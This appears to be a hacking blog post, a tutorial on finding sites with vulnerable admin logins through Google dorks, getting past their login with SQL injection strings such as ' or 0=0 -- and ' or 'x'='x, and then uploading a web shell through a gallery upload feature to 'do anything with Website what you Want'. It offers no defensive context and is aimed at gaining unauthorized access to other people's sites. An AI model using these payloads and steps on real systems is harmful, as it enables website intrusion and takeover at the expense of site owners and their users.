Shell Uploading With SQL Injection



So Let's Start with simple Instructions.

What we Need Simple or Advance sql injection vulnerable Website eg.www.example.com/admin/adminlogin.asp

So Let's start With Tutourial.

1.We need to find Sql vulnerable website.
Like using your smartsense and playing with Google.
That is called google hacking
so how to use google hacking. Everyone Know about google dorks.
So use simple google dorks.
eg. inurl:adminlogin.asp or php or aspx
inurl:admin/adminlogin.aspx or php or asp


[Image: sql1.png]

You Can find these dorks On google Type "GHDB"
(google Hacking Database)

2.After you finding a website then you want to hack it or gain admin access So how to do it.
Here is same thing your smartsense.
First of fall use simple thing 
Username:admin
password:admin

if it is not working then use sql queries that is in simple codes.
That sql queries is used by database like 'or''='
0=0 if 0/=0 then 1=1 
something like that.
username:admin
password:'or''='
[/color]
So here Is some sql Queries that is maily used.
'or''='
' or'1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

3.Now after that you have Admin Access.
After entering in Website You Want to find like gallery links or something that is add category like that.

[Image: sql3.png]

4.So Find the option of upload.
5.Select file. Select your shell here then upload it.
Everything is done now you want to find it.

Go to Website eg.www.example.com

[Image: sql6.png]

find your category or gallery link open it in gallery there is images showing.


Enjoy The Shell uploading. And do anything with Website what you Want..
Thanks for reading..




Share your views...

0 Respones to "Shell Uploading With SQL Injection"

Post a Comment

 

WhoIsAmoungUS

Trace

Copy Restrict

About Me

Scroll Button

Popular Posts

Counter

© 2014 Hacking-The Art of Exploitation All Rights Reserved Vishal S Sangwa A Ethical Hacker White Hat Hacker